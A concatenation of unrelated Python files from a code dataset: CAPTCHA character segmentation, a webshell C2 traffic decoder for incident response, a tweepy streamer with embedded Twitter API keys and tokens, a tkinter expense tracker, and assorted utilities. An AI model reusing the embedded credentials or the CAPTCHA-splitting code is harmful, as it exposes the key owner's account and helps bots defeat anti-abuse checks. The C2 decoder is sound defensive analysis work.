'*'))\r\ncounts = {}\r\n\r\nprint(f'Total no of images : {len(captcha_images)}')\r\nindex = 0\r\n\r\n\r\ndef getAvgContour(cont):\r\n arealist = []\r\n for c in cont:\r\n area = cv2.contourArea(c)\r\n arealist.append(area)\r\n avg = sum(arealist)/len(arealist)\r\n print(f'Avg Contour Area : {avg}')\r\n return avg\r\n\r\n\r\ndef get_auto_thresh_value(img, sigma=None):\r\n if sigma is None:\r\n sigma = 0.3\r\n elif isinstance(sigma, int):\r\n # print(\"int\")\r\n sigma = float(sigma / pow(10, len(str(sigma))))\r\n elif isinstance(sigma, float):\r\n pass\r\n # print(sigma)\r\n median = np.median(img)\r\n # print(median)\r\n lower = int(max(0, ((1 - sigma) * median)))\r\n upper = int(min(255, ((1 + sigma) * median)))\r\n return lower, upper\r\n\r\n\r\ndef get_single_char(img):\r\n file_name = os.path.basename(img)\r\n correct_text = os.path.splitext(file_name)[0]\r\n print(file_name)\r\n print(correct_text)\r\n # load image\r\n image = cv2.imread(img)\r\n # convert to gray\r\n gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\r\n lower_thresh, upper_thresh = get_auto_thresh_value(gray, 3) # image , percent of reduction\r\n print((lower_thresh,upper_thresh))\r\n thresh = cv2.threshold(gray, lower_thresh, upper_thresh, cv2.THRESH_BINARY_INV | cv2.THRESH_OTSU)[1]\r\n erode_kernel = cv2.getStructuringElement(cv2.MORPH_ERODE, (2, 2))\r\n eroded = cv2.erode(thresh, erode_kernel, iterations=3)\r\n dilate_kernel = cv2.getStructuringElement(cv2.MORPH_CROSS, (3, 2))\r\n dilated = cv2.dilate(eroded, dilate_kernel, iterations=3)\r\n # opening = cv2.morphologyEx(dilated, cv2.MORPH_ERODE, dilate_kernel,iterations=2)\r\n # cv2.imshow(\"thesh\", eroded)\r\n invert = cv2.bitwise_not(dilated)\r\n # cv2.imshow(\"\",invert)\r\n dilate_kernel_1 = cv2.getStructuringElement(cv2.MORPH_CROSS, (3, 3))\r\n dilate = cv2.dilate(invert, dilate_kernel_1, iterations=2)\r\n\r\n cont, hir = cv2.findContours(eroded, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)\r\n print(len(cont))\r\n avg_area = getAvgContour(cont)\r\n (sorted_cont, boundingBox) = contours.sort_contours(cont, 'left-to-right')\r\n print(boundingBox)\r\n letter_image_regions = []\r\n if len(cont) >= 4:\r\n for c in sorted_cont:\r\n (x, y, w, h) = cv2.boundingRect(c)\r\n if cv2.contourArea(c) > avg_area:\r\n # roi = invert[y:y + h, x:x + w]\r\n if w / h > 1.25:\r\n half_width = int(w / 2)\r\n letter_image_regions.append((x, y, half_width, h)) ## x ,y, w,h \r\n letter_image_regions.append((x + half_width, y, half_width, h)) ## x ,y ,w, h\r\n # roi = invert[y-2:y + half_width, x+half_width:w]\r\n # roi = invert[y - 2:y + h + 2, x - 2:x + w + 2]\r\n # rect = cv2.rectangle(image, (start_x, start_y), (end_x, end_y), (0, 0, 255), 1)\r\n # cv2.imshow(\"\", rect)\r\n else:\r\n letter_image_regions.append((x,y,w,h))\r\n # roi = invert[y-2 : y+h+2, x-2:x+w+2]\r\n # rect = cv2.rectangle(image,(x,y),(x+w, y+h),(0,255,0),1)\r\n # cv2.imshow(\"\", rect)\r\n # cv2.waitKey(0)\r\n if len(letter_image_regions) != 4:\r\n continue\r\n \r\n for i in letter_image_regions:\r\n print(i)\r\n (x, y, w, h) = i\r\n cv2.rectangle(image,(x-2,y-2),(x+w, y+h),(0,255,0),1)\r\n cv2.imshow(\"\",image)\r\n cv2.waitKey(0)\r\n \r\n # cv2.imshow(\"canny\", cv2.Canny(invert,100,200,apertureSize=7,L2gradient = True))\r\n cv2.imshow(\"\",dilate)\r\n cv2.imshow(\"or\", image)\r\n cv2.waitKey(0)\r\n\r\n\r\n\r\nget_single_char(captcha_images[20])","sub_path":"extract_char_from_image.py","file_name":"extract_char_from_image.py","file_ext":"py","file_size_in_byte":3991,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"282426787","text":"\"\"\"\nIsland Perimeter\nhttps://leetcode.com/problems/island-perimeter/\n\nTime O(n*m)\nSpace O(n*m)\n\"\"\"\nclass Solution:\n def islandPerimeter(self, grid: List[List[int]]) -> int:\n for row in range(len(grid)):\n for col, val in enumerate(grid[row]):\n if val == 1:\n return self.calcPerimeter(grid, row, col)\n return 0\n \n def calcPerimeter(self, grid, row, col) -> int:\n perimeter = 0\n stack = [] # Tuple[int, int]\n stack.append((row, col))\n grid[row][col] = 2\n while stack:\n r, c = stack.pop()\n for dr, dc in [(-1, 0), (1, 0), (0, -1), (0, 1)]:\n nr, nc = r + dr, c + dc\n if nr < 0 or nc < 0 or nr >= len(grid) or nc >= len(grid[nr]) or grid[nr][nc] == 0:\n perimeter += 1\n elif grid[nr][nc] == 1:\n grid[nr][nc] = 2\n stack.append((nr, nc))\n return perimeter\n","sub_path":"python/island_perimeter.py","file_name":"island_perimeter.py","file_ext":"py","file_size_in_byte":982,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"190801044","text":"import math \nimport matplotlib.pyplot as plt\nimport numpy as np\nimport random as rnd\nimport networkx as nx\nfrom REDSpickle import net_creation\nimport pickle\nimport datetime\n#define global variables N and R\nN=50\nR=0.2\nglobal pos\n\n\ndef euclidean_dist(i,j):\n\t\n\tx1,y1=RGG.node[i]['pos']\n\tx2,y2=RGG.node[j]['pos']\n\treturn math.sqrt((x1-x2)**2+(y1-y2)**2)\n\ndef creation(k):\n\tglobal RGG,pos\n\ttmp_dense=0.0\n\tRGG=nx.Graph()\n\tRGG.add_nodes_from(range(N))\n\tpos={}\n\t\n\tdense=net_creation(k)\n\tfor i in range(N):\n\t\tx=round(rnd.random(),2)\n\t\ty=round(rnd.random(),2)\n\t\t#Allocate the random x,y coordinates\n\t\tRGG.node[i]['pos']=[x,y]\n\t\tpos[i]=RGG.node[i]['pos']\n\n\t\n\tfor i in range(N-1):\n\t\tfor j in range(i+1,N):\n\t\t\tif euclidean_dist(i,j)=dense:\n\t\t\t\tbreak\n\t\tif tmp_dense>=dense:\n\t\t\tbreak\n\nstart=datetime.datetime.now().time()\n#Create 10 networks\nfor i in range(10):\n\tcreation(i)\n\n\tvar=\"pickleRGG/RGG\"+str(i)+\".pickle\"\n\twith open(var, 'wb') as f:\n\t # Pickle the 'data' dictionary using the highest protocol available.\n\t pickle.dump(RGG, f, pickle.HIGHEST_PROTOCOL)\n\nend= datetime.datetime.now().time()\n\nfile=open(\"logfile.txt\",\"w\") \nfile.write(\"Start: \"+str(start)+\" End: \"+str(end))\nfile.close\n\n\n\n\n","sub_path":"random_walk_simulation/RGGpickle.py","file_name":"RGGpickle.py","file_ext":"py","file_size_in_byte":1257,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"287287221","text":"#!/usr/bin/python\n\nimport time\nfrom dotstar import Adafruit_DotStar\n\nnumpixels = 230 # Number of LEDs in strip\n\n# Here's how to control the strip from any two GPIO pins:\ndatapin = 17\nclockpin = 27\nstrip = Adafruit_DotStar(numpixels, datapin, clockpin)\n\n# Alternate ways of declaring strip:\n# strip = Adafruit_DotStar(numpixels) # Use SPI (pins 10=MOSI, 11=SCLK)\n# strip = Adafruit_DotStar(numpixels, 32000000) # SPI @ ~32 MHz\n# strip = Adafruit_DotStar() # SPI, No pixel buffer\n# strip = Adafruit_DotStar(32000000) # 32 MHz SPI, no pixel buf\n\n# Append \"order='gbr'\" to declaration for proper colors w/older DotStar strips)\n\nstrip.begin() # Initialize pins for output\nstrip.setBrightness(64) # Limit brightness to ~1/4 duty cycle\n\nfor i in range(numpixels):\n strip.setPixelColor(i, 0)\nstrip.show() # Refresh strip\n","sub_path":"turnoff.py","file_name":"turnoff.py","file_ext":"py","file_size_in_byte":901,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"358744139","text":"\nclass Myclass:\n\n classvariable = 12\n def instanceMethod(self):\n self.instanceVar = 32\n print(self.instanceVar)\n return 'instance method called', self\n\n @classmethod\n def classMethod(cls):\n '''\n class methods dont receive first implicit argument\n This class method has access to Myclass through cls object\n '''\n print(cls.classvariable)\n \n return 'class method called', cls\n\n @staticmethod\n def staticMethod():\n \"\"\"\n static methods dont receive first implicit argument\n static methods don't have access to cls and instance \n \"\"\"\n return 'static method called'\n\n\nobj = Myclass()\n\nprint(obj.instanceMethod())\nprint(obj.classMethod())\nprint(obj.staticMethod())","sub_path":"Python/methods.py","file_name":"methods.py","file_ext":"py","file_size_in_byte":796,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"535300635","text":"import logging\nimport os\nimport sys\n\n\n\nclass LogFilter(object):\n def __init__(self, level):\n self.__level = level\n\n def filter(self, logRecord):\n return logRecord.levelno <= self.__level\n\nclass LogInit:\n def __init__(self, logger, level, destination, formatter):\n self.level = level\n self.logger = logger\n self.destination = destination\n self.formatter = formatter\n\n def initialize(self) -> None:\n try:\n handler = logging.FileHandler(self.destination)\n handler.setLevel(self.level)\n handler.setFormatter(self.formatter)\n handler.addFilter((LogFilter(self.level)))\n self.logger.addHandler(handler)\n except Exception as e:\n exc_type, exc_obj, exc_tb = sys.exc_info()\n fname = os.path.split(exc_tb.tb_frame.f_code.co_filename)[1]\n print(e,exc_type, fname, exc_tb.tb_lineno)\n","sub_path":"tasks/webServer/Logs.py","file_name":"Logs.py","file_ext":"py","file_size_in_byte":927,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"576649316","text":"# NOTE: Limited error checking or resilience. Provided to help understand\n# the C2 traffic, not as a robust incident response tool.\n\nimport re\nimport urlparse\nfrom hashlib import md5\nimport zlib\nimport hashlib\nimport base64\nimport itertools\n\ndebug = True\n# The key needs to be replaced with concatonated value found in the PHP file\nkey = 'bed12836'\n\n# The tshark output is generated from the tshark-commands.txt being executed\n# on a PCAP. Assumes traffic is limited to the two hosts.\ntshark_output = './cmds.txt'\n\ndef string_xor(input_data, shared_key):\n result = ''\n for a, b in zip(input_data, itertools.cycle(shared_key)):\n result += chr(ord(a) ^ ord(b))\n return result\n\ndef decrypt(input_data):\n need_padding = 4 - len(input_data) % 4\n if need_padding:\n input_data += '=' * need_padding\n return zlib.decompress(string_xor(base64.urlsafe_b64decode(input_data), key))\n\ntry:\n cmd_file = open(tshark_output)\n encoded_command = ''\n last_session = ''\n cmd_count = 0\n for line in cmd_file.readlines():\n line = line.strip()\n #print(line)\n if len(line) == 0:\n continue\n\n headers = line.split('\\t')\n #print(headers)\n if len(headers) == 0:\n continue\n # headers[0] = frame.time_relative\n # headers[1] = http.accept_language\n # headers[2] = http.referer\n lang = headers[1].split(';')\n\n # Get the session id and offsets where the cmd parts are\n session_id = None\n query_offsets = list() # The indexes into the\n for index, parts in enumerate(lang):\n # parts ex: ['is-IS,eo', 'q=0.5,el', 'q=0.7,eo', 'q=0.8']\n if index == 0:\n sess_parts = lang[0].split(',')\n session_id = sess_parts[0][0] + sess_parts[1][0]\n else:\n n = re.match('q=0.(\\d)', parts)\n query_offsets.append(int(n.group(1)))\n\n #print(session_id)\n if session_id != last_session:\n # This is a new session, restart building\n encoded_command = ''\n last_session = session_id\n\n # encoded data\n q = headers[2]\n q = urlparse.urlsplit(q)\n query_parameters = q.query.split('&')\n #print(query_parameters)\n # Extract out the query string values\n query_values = list()\n for q in query_parameters:\n j = q.split('=')\n if debug: print(j)\n\n query_values.append(j[1])\n\n if debug: print(query_values)\n\n #print(query_values)\n\n # Build command from parts in query string\n #print(query_offsets)\n for index in query_offsets:\n encoded_command += query_values[index]\n\n # Calculate Header and Footers\n header = md5(session_id + key[:4]).hexdigest()[:3]\n footer = md5(session_id + key[4:]).hexdigest()[:3]\n if debug:\n print(\"Session ID: {0}\".format(session_id))\n print(\"Header: {0}\".format(header))\n print(\"Footer: {0}\".format(footer))\n print(\"Partial Command: \" + encoded_command)\n\n # Find text between header and footer\n start = encoded_command.find(header) + 3\n end = encoded_command.find(footer)\n\n if end > 0: # Found footer\n enc_cmd = encoded_command[start:end]\n if debug: print(\"Without H/F: \" + enc_cmd)\n cmd_count += 1\n print(\"Time Relative: {0}\".format(headers[0]))\n print(decrypt(enc_cmd) + '\\n')\n\nfinally:\n print(\"Number of commands: {0}\".format(cmd_count))\n\ncmd_file.close()\n","sub_path":"decode.py","file_name":"decode.py","file_ext":"py","file_size_in_byte":3590,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"165185335","text":"# -*- coding: utf-8 -*-\n# @Time : 2018/7/9 17:38\n# @Author : Zcs\n# @File : get_month.py\n\nimport datetime\n\nd = datetime.datetime.now()\noneday = datetime.timedelta(days=182)\nday = d - oneday\n# forward_day = str(datetime.datetime(day.year, day.month, day.day, day.hour, day.minute, day.second))\ntime_list = [] # 年月列表,例如今天为2018-07-09,那么前半年数据为 2018-01 至 2018-07\ndata_times = []\nfor i in range(day.month, day.month + 7):\n if i <= 12:\n if i < 10:\n time_str = '%s-0%s-01' % (day.year, i)\n else:\n time_str = '%s-%s-01' % (day.year, i)\n else:\n m = i - 12\n year = day.year + 1\n if m < 10:\n time_str = '%s-0%s-01' % (year, m)\n else:\n time_str = '%s-%s-01' % (year, m)\n\n time_list.append(time_str)\nprint(time_list)","sub_path":"my_time/get_month.py","file_name":"get_month.py","file_ext":"py","file_size_in_byte":845,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"299518166","text":"from __future__ import absolute_import, print_function\nfrom tweepy import OAuthHandler\nfrom tweepy import Stream\nfrom tweepy.streaming import StreamListener\nimport json\nimport tweepy\nfrom tweepy.utils import import_simplejson\nimport string\n\n\ndef log_msg(filepath, text, date):\n with open(filepath, \"a\") as myfile:\n myfile.write(date + \"\\n\" + str(text.encode('utf-8')) + \"\\n-------------------------\\n\")\n\n\ndef remove_unprintable(text):\n text = filter(lambda x: x in string.printable, text)\n return text\n\n\nclass StdOutListener(StreamListener):\n \"\"\" A listener handles tweets that are received from the stream.\n This is a basic listener that just prints received tweets to stdout.\n \"\"\"\n\n def on_data(self, data):\n # print(data)\n json_tweet = json.loads(data)\n if \"text\" in json_tweet:\n text = remove_unprintable(json_tweet[\"text\"])\n date = json_tweet[\"created_at\"]\n log_msg(\"output.txt\", text, date)\n\n\nif __name__ == '__main__':\n l = StdOutListener()\n\n consumer_key = \"Es3lDZ9L6ukHRUl1ya5uOTPtx\"\n consumer_secret = \"4UmLc6z65P9Z7nveZnBKssKEnPV71svogCwvhnKaIvM44syi5B\"\n access_token = \"370737927-rr0xbO21qRS92QgCLqvU9qg1FDqic6vuWTlncT0x\"\n access_token_secret = \"ql8fXdZ4acRTDNAi4aZHq1OefpIz6qt8eTXQdj0s79IWK\"\n\n auth = OAuthHandler(consumer_key, consumer_secret)\n auth.set_access_token(access_token, access_token_secret)\n stream = Stream(auth, l)\n stream.filter(track=['basketball', 'GSOPAO', '#GSOPAO', 'panathinaikos'])","sub_path":"to_find_out_tweets_format.py","file_name":"to_find_out_tweets_format.py","file_ext":"py","file_size_in_byte":1525,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"160793786","text":"import pytest\n\nfrom django.urls import reverse\nfrom rest_framework import status\n\n# mark the whole module for db use\nfrom core.test_utils import LeelooTestCase\n\npytestmark = pytest.mark.django_db\n\n\nmetadata_view_names = (\n 'business-type',\n 'country',\n 'employee-range',\n 'interaction-type',\n 'sector',\n 'service',\n 'role',\n 'title',\n 'turnover',\n 'uk-region'\n)\n\nmetadata_views_ids = (\n 'business types view',\n 'countries view',\n 'employee ranges view',\n 'interaction types view',\n 'sector view',\n 'service view',\n 'roles view',\n 'titles view',\n 'turnover view',\n 'UK regions view'\n)\n\n\n@pytest.mark.parametrize('view_name',\n metadata_view_names,\n ids=metadata_views_ids)\ndef test_metadata_view_get(view_name, api_client):\n \"\"\"Test a metadata view for 200 only.\"\"\"\n\n url = reverse(viewname=view_name)\n response = api_client.get(url)\n\n assert response.status_code == status.HTTP_200_OK\n\n\n@pytest.mark.parametrize('view_name',\n metadata_view_names,\n ids=metadata_views_ids)\ndef test_metadata_view_post(view_name, api_client):\n \"\"\"Test views are read only.\"\"\"\n\n url = reverse(viewname=view_name)\n response = api_client.post(url)\n assert response.status_code == status.HTTP_405_METHOD_NOT_ALLOWED\n\n\n@pytest.mark.parametrize('view_name',\n metadata_view_names,\n ids=metadata_views_ids)\ndef test_metadata_view_put(view_name, api_client):\n \"\"\"Test views are read only.\"\"\"\n\n url = reverse(viewname=view_name)\n response = api_client.put(url)\n\n assert response.status_code == status.HTTP_405_METHOD_NOT_ALLOWED\n\n\n@pytest.mark.parametrize('view_name',\n metadata_view_names,\n ids=metadata_views_ids)\ndef test_metadata_view_patch(view_name, api_client):\n \"\"\"Test views are read only.\"\"\"\n\n url = reverse(viewname=view_name)\n response = api_client.patch(url)\n\n assert response.status_code == status.HTTP_405_METHOD_NOT_ALLOWED\n","sub_path":"leeloo/company/test/test_metadata_views.py","file_name":"test_metadata_views.py","file_ext":"py","file_size_in_byte":2110,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"133183747","text":"# GUI-การบ้าน.py\r\n\r\n\"\"\"การบ้าน\r\n-------\r\nสร้างช่องกรอกจำนวน แล้วคำนวณค่า total แล้วบันทึกเป็นข้อมูล\r\ndata = [‘น้ำเต้าหู้’,20,3,60]\r\ndata = [ชื่อรายการ, ราคา, จำนวน, รวมทั้งหมด]\r\n\r\nextra: ถ้าทำได้ให้บันทึกเวลาตอนเซฟด้วย\r\nคำใบ้: \r\nfrom datetime import datetime\r\ndt = datetime.now()\r\n\"\"\"\r\n\r\n\r\nfrom tkinter import *\r\nfrom tkinter.ttk import Notebook\r\nfrom tkinter import ttk, messagebox\r\nfrom datetime import datetime\r\nimport csv\r\n\r\n\r\nGUI = Tk()\r\nGUI.title('Program บันทึกค่าใช��จ่าย by SJ')\r\nGUI.geometry('600x620+500+50') #แนวแกน X,Y จากมุมซ้ายบน\r\n#B1 = Button(GUI,text='Hello')\r\n#B1.pack(ipadx=50,ipady=20) # ติดปุ่มเข้าไปกับ GUI หลัก(internal padding ความใหญ่pixel)\r\nFONT1 = ('Gadugi',18,) #เปลี่ยนFont 'Angsana New'\r\nFONT2 = ('Times New Roman',10,'bold')\r\n\r\n######### Menubar #####################\r\nmenubar = Menu(GUI)\r\nGUI.config(menu=menubar)\r\n\r\n#File menu\r\nfilemenu = Menu(menubar,tearoff=0)\r\nmenubar.add_cascade(label='File',menu=filemenu)\r\nfilemenu.add_command(label='inport CSV')\r\nfilemenu.add_command(label='Export to googlesheet')\r\n\r\ndef About():\r\n\tmessagebox.showinfo('About', 'สวัสดีครับ\\n สวัสดี')\r\n#Help\r\nhelpmenu = Menu(menubar,tearoff=0)\r\nmenubar.add_cascade(label='Help',menu=helpmenu)\r\nhelpmenu.add_command(label='About',command=About)\r\n\r\n\r\n\r\n#Donate\r\ndonatemenu = Menu(menubar,tearoff=0)\r\nmenubar.add_cascade(label='Donate',menu=donatemenu)\r\n\r\n\r\n##############################\r\n\r\n\r\nTab = ttk.Notebook(GUI)\r\nT1 = ttk.Frame(Tab)\r\nT2 = ttk.Frame(Tab)\r\n\r\nexpenseicon = PhotoImage(file='expense.png').subsample(14)\r\nlisticon = PhotoImage(file='list.png').subsample(6)\r\nTab.pack(fill= BOTH ,expand=1)\r\n\r\nTab.add(T1, text=f'{\"Add Expense\":^{20}}',image=expenseicon,compound='top')\r\nTab.add(T2, text=f'{\"Expense List\": ^20s}',image=listicon,compound='top')\r\n\r\nF1=Frame(T1)\r\nF1.pack()\r\n\r\nF2=Frame(T2)\r\nF2.pack()\r\n\r\n\r\n\r\n#Dictionary\r\ndays = {'Mon':'จันทร์',\r\n\t\t'Tue':'อังคาร',\r\n\t\t'Wed':'พุธ',\r\n\t\t'Thu':'พฤหัสบดี',\r\n\t\t'Fri':'ศุกร์',\r\n\t\t'Sat':'เสาร์',\r\n\t\t'Sun':'อาทิตย์'}\r\n\r\n\r\n\r\ndef Save(event=None):\r\n\texpense = v_expense.get() #ดึงค่ามาจาก v_expense = StringVar()\r\n\tprice = v_price.get()\r\n\tamount = v_amount.get()\r\n\r\n\tif expense == '':\r\n\t\tprint('No Data')\r\n\t\tmessagebox.showinfo('Error','กรุณากรอกข้อมูลให้ครบ')\r\n\t\treturn\r\n\telif price =='':\r\n\t\tprint('No Data')\r\n\t\tmessagebox.showinfo('Error','กรุณากรอกราคา')\r\n\t\treturn\r\n\telif amount =='':\r\n\t\tamount = 1\r\n\t\t#print('No Data')\r\n\t\t#messagebox.showinfo('Error','กรุณากรอกจำนวน')\r\n\t\t#return\t\r\n\r\n\ttotal = float(price)*float(amount)\r\n\ttry:\r\n\t\ttotal = float(price)*float(amount)\r\n\t\ttoday = datetime.now().strftime('%a') #days=['Mon'] = 'จันทร์'\r\n\t\tprint(today)\r\n\t\tstamp = datetime.now()\r\n\t\tdt1 = stamp.strftime('%Y-%m-%d %H:%M:%S')\r\n\t\ttranscationid= stamp.strftime('%Y%m%d%H%M%f')\r\n\r\n\t\tdt1 = days[today] + '-' + dt1\r\n\t\tprint('รายการ: {} ราคา: {} จำนวน: {} รวมมูลค่า: {} วัน: {} '.format(expense,price,amount,total,dt1))\r\n\t\t#textshow = 'รายการ: {} บาท/รายการ\\n จำนวน: {} รายการ\\n รวมมูลค่า: {} บาท\\n เวลา: {} '.format(expense,price,amount,total,dt)\r\n\t\t#messagebox.showinfo('บันทึกค่าใช้จ่าย',textshow)\r\n\t\ttext = 'รายการ: {}\\n ราคา: {}\\n'.format(expense,price)\r\n\t\ttext = text + 'จำนวน: {}\\n รวมมูลค่า: {}\\n วัน: {}\\n '.format(amount,total,dt1)\r\n\t\tv_result.set(text)\r\n\r\n\t\t\t\t \r\n\t\t#Clear ข้อมูลเก่า\r\n\t\tv_expense.set('')\r\n\t\tv_price.set('')\r\n\t\tv_amount.set('')\r\n\t\t\r\n\t\t#บันทึกข้อมูลลง CSV อย่างลืม Import ลง CSV ด้วย\r\n\t\twith open('savedata.csv','a',encoding='UTF-8',newline='') as f:\r\n\t\t\t#with เปิดไฟล์แล้วปิดอัตโนมัติ\r\n\t\t\t# 'a' การบันทึกเพิ่มข้อมูลไปเรื่อยๆต่อจากข้อมูลเก่า (แต่ 'w' เขียนใหม่ทั้งหมด)\r\n\t\t\t# newline='' ทำให้ข้อมูลไม่มีบรรทัดว่าง \r\n\t\t\tfw = csv.writer(f) #สร้างฟังก์ชันสำหรับเขียนข้อมูล\r\n\t\t\tdata = [transcationid,dt1,expense,price,amount,total]\r\n\t\t\tfw.writerow(data)\r\n\t\t\r\n\t\t\t\r\n\r\n\t\tE1.focus()#ทำให้ Curser กลับไปตำแหน่งช่องกรอก E1\r\n\t\tupdate_table()\r\n\texcept Exception as e:\r\n\r\n\t\tprint('ERROR',e)\r\n\t\t#messagebox.showerror('Error','กรุณากรอกข้อมูลใหม่ กรอกเฉพาะตัวเลข')\r\n\t\tmessagebox.showwarning('Error','กรุณากรอกข้อมูลใหม่ กรอกเฉพาะตัวเลข')\r\n\t\t#messagebox.showinfo('Error','กรุณากรอกข้อมูล���หม่ กรอกเฉพาะตัวเลข')\r\n\r\n\t\tv_expense.set('') #Clear ข้อมูลเก่า\r\n\t\tv_price.set('')\r\n\t\tv_amount.set('')\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n# ทำให้สามารถกด enter ได้\r\nGUI.bind('',Save) #ต้องเพิ่มใน def Save(event=None) ด้วย\r\n\r\n#--------Background 1------------\r\nbg = PhotoImage(file='account.png').subsample(1)\r\nacpic = ttk.Label(F1, image=bg)\r\nacpic.pack(pady=1)\r\n\r\n\r\n#-----text1-------\r\nL = ttk.Label(F1,text='รายการค่าใช้จ่าย', font=FONT1).pack()\r\nv_expense = StringVar() #StringVar() คือ ตัวแปรพิเศษสำหรับเก็บข้อมูลใน GUI\r\n\r\nE1 = ttk.Entry(F1,textvariable=v_expense,font=FONT1,)\r\nE1.pack()\r\n\r\n#-----text2-------\r\nL = ttk.Label(F1,text='ราคา(บาท)', font=FONT1).pack()\r\nv_price = StringVar() \r\n\r\nE2 = ttk.Entry(F1,textvariable=v_price,font=FONT1)\r\nE2.pack()\r\n\r\n#-----text3-------\r\nL = ttk.Label(F1,text='จำนวน', font=FONT1).pack()\r\nv_amount = StringVar() \r\n\r\nE3 = ttk.Entry(F1,textvariable=v_amount,font=FONT1)\r\nE3.pack()\r\n\r\n\r\n\r\nsaveicon = PhotoImage(file='save.png').subsample(8)\r\nB2 = ttk.Button(F1,image=saveicon,text=f'{\"SAVE\":^{10}}',command=Save,compound='top')\r\nB2.pack(ipadx=20,ipady=10,pady=10) #ติดปุ่มเข้าไปกับ GUI (ใช้ ipadไม่ได้)\r\n\r\n\r\nv_result =StringVar()\r\nv_result.set('-------ผลลัพธ์-------')\r\nresult = ttk.Label(F1,textvariable=v_result,font=FONT2,foreground='blue')\r\nresult.pack(pady=10)\r\n\r\n\r\n############### Tab 2 ###############\r\n# rs=[]\r\n\r\ndef read_csv():\r\n\t# global rs\r\n\twith open('savedata.csv',newline='',encoding='utf-8') as f:\r\n\t\tfr = csv.reader(f)\r\n\t\tdata = list(fr)\r\n\t\t# rs = data\r\n\t\t# print(rs)\r\n\treturn data\r\n# print(data)\r\n\t\t# print('--------')\r\n\t\t# print(data[0][0])\r\n\t\t# for a,b,c,d,e in data:\r\n\t\t# \tprint(b)\r\n\r\n# rs = read_csv()\r\n# print(rs[0]) \r\n\r\n#table\r\nL = ttk.Label(T2,text='ตารางแสดงผลลัพธ์ทั้งหมด', font=FONT1).pack(pady=5)\r\nheader = ['รหัสรายการ','วัน-เวลา','รายการ','ราคา','จำนวน','รวมยอด']\r\nresulttable = ttk.Treeview(T2, columns=header,show='headings',heigh=15)\r\nresulttable.pack(pady=20)\r\n\r\n# for i in range(len(header)):\r\n# \tresulttable.heading(header[i],text=header[i])\r\n\r\nfor h in header:\r\n\tresulttable.heading(h,text=h)\r\n\r\nheaderwidth = [120,150,100,50,50,50]\r\nfor h,w in zip(header,headerwidth):\r\n\tresulttable.column(h,width=w)\r\n\r\n\r\nalltransaction = {}\r\n\r\ndef UpdateCSV():\r\n\twith open('savedata.csv','w',newline='',encoding='utf-8') as f:\r\n\t\tfw = csv.writer(f)\r\n\t\t#เตรียมข้อมูลให้กลายเป็น list\r\n\t\tdata = list(alltransaction.values())\r\n\t\tfw.writerows(data) # multipleline nested list [[],[],[]]\r\n\t\tprint('Table was updated')\r\n\t\t\r\n\r\n# resulttable.insert('','end',value=[1,2,3,4,5])\r\ndef DeleteRecord(event=None):\r\n\tcheck = messagebox.askyesno('Confirm?','คุณต้องการลบข้อมูลใช่หรือไม่')\r\n\tprint('Yes/No',check)\r\n\tif check == True:\r\n\t\tprint('delete')\r\n\t\tselect = resulttable.selection()\r\n\t\t#print(select)\r\n\t\tdata = resulttable.item(select)\r\n\t\tdata = data['values']\r\n\t\ttranscationid = data[0]\r\n\t\t#print(transcationid)\r\n\t\tdel alltransaction[str(transcationid)] #delete data in dictalltransaction = {}\r\n\t\t#print(alltransaction)\r\n\t\tUpdateCSV()\r\n\t\tupdate_table()\r\n\telse:\r\n\t\tprint('cancle')\r\nBDelete = ttk.Button(T2,text='delete',command=DeleteRecord)\r\nBDelete.place(x=50,y=450)\r\n\r\nresulttable.bind('',DeleteRecord)\r\n\r\n\r\n\r\ndef update_table():\r\n\tresulttable.delete(*resulttable.get_children()) #เคลียข้อมูลชุดเก่าก่อน\r\n\ttry:\r\n\t\tdata = read_csv()\r\n\t\tfor d in data:\r\n\t\t\t#create transcation data\r\n\t\t\talltransaction[d[0]] = d #d[0] =transactionid\r\n\t\t\tresulttable.insert('',0,value=d)\r\n\t\t#print(alltransaction)\r\n\texcept Exception as e:\r\n\t\tprint('No file')\r\n\t\tprint('ERROR:',e)\r\n\t# print(data)\r\n\r\n\r\n\r\n\r\n\r\n\r\n####Right Click Menu#######\r\n'''\r\nrightclick = menu(GUI,tearoff=0)\r\nrightclick.add_command(label='Edit')\r\nrightclick.add_command(label='Delete')\r\n\r\n\r\ndef menupopup(event):\r\n\t#print(event.x_root, event.y_root)\r\n\trightclick.post(event.x_root,event.y_root)\r\n\r\nresulttable.bind('',menupopup) #ถ้าเปลี่ยนเป็น GUI.bind จะclickขวาตรงไหนก็ขึ้น\r\n'''\r\n\r\nupdate_table()\r\nprint('GET CHILD:',resulttable.get_children())\r\nGUI.bind('',lambda x: E2.focus()) #ดูว่ามีการกดปุ่ม enter หรื���เปล่า ถ้ามีก็เหมือนรัน Save จึงต้องต้องเพิ่มใน def Save(event=None) ด้วย \r\nGUI.mainloop()\r\n#เป็นการ Run ตลอดเวลา GUI สมบูรณ์ เช็คตลอดว่ามีใครกดปุ่มอะไรหรือยัง\r\n","sub_path":"GUI Expense.py","file_name":"GUI Expense.py","file_ext":"py","file_size_in_byte":10569,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"400413707","text":"from resources import resource_interface as interface\n\nclass LogStream(interface.InterfaceResource):\n def __init__(self, cloud_watch_logs, resource_names):\n self.cloud_watch_logs = cloud_watch_logs\n self.resource_names = resource_names\n\n def is_resource_created(self) -> bool:\n response = self.cloud_watch_logs.describe_log_streams(\n logGroupName=self.resource_names.get_log_group_name(),\n 